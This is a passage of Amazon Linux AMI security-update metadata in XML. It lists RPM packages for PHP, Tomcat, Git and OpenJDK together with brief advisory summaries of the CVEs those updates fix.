version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.27" release="1.27.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-soap-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-bcmath" 
version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-enchant" 
version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.27" 
release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-devel" 
version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.33" release="1.136.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-bcmath-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package 
name="php56-gd" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.33" release="1.136.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-xmlrpc-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.33" 
release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" 
version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.33-1.136.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-947</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-947: low priority package update for tomcat7</title><issued date="2018-02-07 17:13:00" /><updated date="2018-02-08 21:32:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15706:
As part of the fix for bug 61201, the documentation for Apache Tomcat 9.0.0.M22 to 9.0.1, 8.5.16 to 8.5.23, 8.0.45 to 8.0.47 and 7.0.79 to 7.0.82 included an updated description of the search algorithm used by the CGI Servlet to identify which script to execute. The update was not correct. As a result, some scripts may have failed to execute as expected and other scripts may have been executed unexpectedly. Note that the behaviour of the CGI servlet has remained unchanged in this regard. It is only the documentation of the behaviour that was wrong and has been corrected.
1540828:
CVE-2017-15706 tomcat: Incorrect documentation of CGI Servlet search algorithm may lead to misconfiguration
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15706" title="" id="CVE-2017-15706" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-javadoc" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.84" release="1.31.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.84-1.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-948</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-948: low priority package update for git</title><issued date="2018-02-07 17:34:00" /><updated date="2018-02-08 21:32:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15298:
Git through 2.14.2 mishandles layers of tree objects, which allows remote attackers to cause a denial of service (memory consumption) via a crafted repository, aka a Git bomb. This can also have an impact of disk consumption; however, an affected process typically would not survive its attempt to build the data structure in memory before writing to disk.
1510455:
CVE-2017-15298 git: Mishandling layers of tree objects
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15298" title="" id="CVE-2017-15298" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-daemon" version="2.13.6" release="2.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.13.6-2.56.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git" version="2.13.6" release="2.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.13.6-2.56.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.13.6" release="2.56.amzn1" epoch="0" 
arch="noarch"><filename>Packages/perl-Git-SVN-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.13.6" release="2.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.13.6-2.56.amzn1.x86_64.rpm</filename></package><package name="git-svn" version="2.13.6" release="2.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.13.6-2.56.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.13.6" release="2.56.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.13.6-2.56.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.13.6" release="2.56.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.13.6-2.56.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.13.6" release="2.56.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.13.6-2.56.amzn1.i686.rpm</filename></package><package name="git" version="2.13.6" release="2.56.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.13.6-2.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-949</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-949: important priority package update for java-1.8.0-openjdk</title><issued date="2018-02-07 17:45:00" /><updated date="2018-02-08 21:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2678:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534263:
CVE-2018-2678 OpenJDK: unbounded memory allocation in BasicAttributes deserialization (JNDI, 8191142)
CVE-2018-2677:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534288:
CVE-2018-2677 OpenJDK: unbounded memory allocation during deserialization (AWT, 8190289)
CVE-2018-2663:
